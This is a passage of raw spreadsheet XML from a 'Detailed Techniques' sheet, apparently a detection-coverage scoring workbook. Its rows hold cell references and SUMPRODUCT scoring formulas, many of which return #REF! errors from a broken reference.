      <c r="M9" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N9" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O9" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P9" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q9" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R9" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S9" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T9" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U9" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V9" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W9" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X9" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y9" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="10" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A10" s="8" t="s">
        <v>21</v>
      </c>
      <c r="B10" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C10" s="8" t="s">
        <v>329</v>
      </c>
      <c r="D10" s="10" t="s">
        <v>330</v>
      </c>
      <c r="E10" s="10" t="s">
        <v>331</v>
      </c>
      <c r="F10" s="10" t="s">
        <v>332</v>
      </c>
      <c r="G10" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K10,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H10" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I10" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J10" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K10" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L10" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M10" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N10" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O10" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P10" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q10" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R10" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S10" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T10" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U10" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V10" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W10" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X10" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F10&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F10))-LEN(SUBSTITUTE(TRIM(F10),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y10" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="11" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A11" s="8" t="s">
        <v>23</v>
      </c>
      <c r="B11" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C11" s="8" t="s">
        <v>333</v>
      </c>
      <c r="D11" s="10" t="s">
        <v>334</v>
      </c>
      <c r="E11" s="10" t="s">
        <v>323</v>
      </c>
      <c r="F11" s="10" t="s">
        <v>335</v>
      </c>
      <c r="G11" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K11,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H11" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I11" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J11" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K11" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L11" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M11" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N11" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O11" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P11" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q11" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R11" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S11" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T11" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U11" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V11" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W11" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X11" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F11&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F11))-LEN(SUBSTITUTE(TRIM(F11),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y11" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="12" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A12" s="8" t="s">
        <v>77</v>
      </c>
      <c r="B12" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C12" s="8" t="s">
        <v>336</v>
      </c>
      <c r="D12" s="10" t="s">
        <v>337</v>
      </c>
      <c r="E12" s="10" t="s">
        <v>338</v>
      </c>
      <c r="F12" s="10" t="s">
        <v>339</v>
      </c>
      <c r="G12" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K12,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H12" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I12" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J12" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K12" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L12" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M12" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N12" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O12" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P12" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q12" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R12" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S12" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T12" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U12" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V12" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W12" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X12" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F12&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F12))-LEN(SUBSTITUTE(TRIM(F12),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y12" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="13" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A13" s="8" t="s">
        <v>92</v>
      </c>
      <c r="B13" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C13" s="8" t="s">
        <v>340</v>
      </c>
      <c r="D13" s="10" t="s">
        <v>341</v>
      </c>
      <c r="E13" s="10" t="s">
        <v>342</v>
      </c>
      <c r="F13" s="10" t="s">
        <v>343</v>
      </c>
      <c r="G13" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K13,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H13" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I13" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J13" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K13" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L13" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M13" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N13" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O13" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P13" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q13" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R13" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S13" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T13" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U13" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V13" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W13" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X13" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F13&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F13))-LEN(SUBSTITUTE(TRIM(F13),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y13" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="14" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A14" s="8" t="s">
        <v>112</v>
      </c>
      <c r="B14" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C14" s="8" t="s">
        <v>345</v>
      </c>
      <c r="D14" s="10" t="s">
        <v>346</v>
      </c>
      <c r="E14" s="10" t="s">
        <v>347</v>
      </c>
      <c r="F14" s="10" t="s">
        <v>348</v>
      </c>
      <c r="G14" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K14,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H14" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I14" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J14" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K14" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L14" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M14" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N14" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O14" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P14" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q14" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R14" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S14" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T14" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U14" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V14" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W14" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X14" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F14&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F14))-LEN(SUBSTITUTE(TRIM(F14),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y14" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="15" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A15" s="8" t="s">
        <v>213</v>
      </c>
      <c r="B15" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C15" s="8" t="s">
        <v>349</v>
      </c>
      <c r="D15" s="10" t="s">
        <v>350</v>
      </c>
      <c r="E15" s="10" t="s">
        <v>351</v>
      </c>
      <c r="F15" s="10" t="s">
        <v>352</v>
      </c>
      <c r="G15" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K15,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H15" s="51">
